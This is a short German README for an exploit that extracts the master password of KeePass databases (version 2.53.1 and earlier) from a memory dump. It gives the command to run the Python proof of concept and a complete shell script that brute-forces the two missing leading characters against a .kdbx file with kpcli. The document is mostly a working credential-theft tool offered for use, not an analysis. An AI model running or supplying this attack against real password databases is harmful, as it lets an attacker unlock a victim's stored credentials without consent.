
Master-Passwort einer Keepass-Datenbank <= 2.53.1 abrufen
python3 poc.py <PathToDmp>

Zur Erinnerung: Das erste Zeichen kann nicht im Dump gefunden werden, und für das zweite gibt dir das Skript nur wenige Möglichkeiten. In jedem Fall empfehlen wir, den Brute-Force-Angriff auf 2 Zeichen mit dem folgenden Skript durchzuführen:
#!/bin/sh
# Usage: ./keepass-pwn.sh Database.kdbx wordlist.txt (wordlist with 2 char)
while read i
do
echo "Using password: \"$i\""
echo "$i" | kpcli --kdb=$1 && exit 0
done < $2
Dieses Skript funktioniert sehr gut auf einem physischen Rechner, bei virtuellen Maschinen scheint es nicht stabil zu sein
Übrigens: Das Python-Skript in diesem Projekt folgt dem Ansatz des folgenden Projekts: https://github.com/vdohney/keepass-password-dumper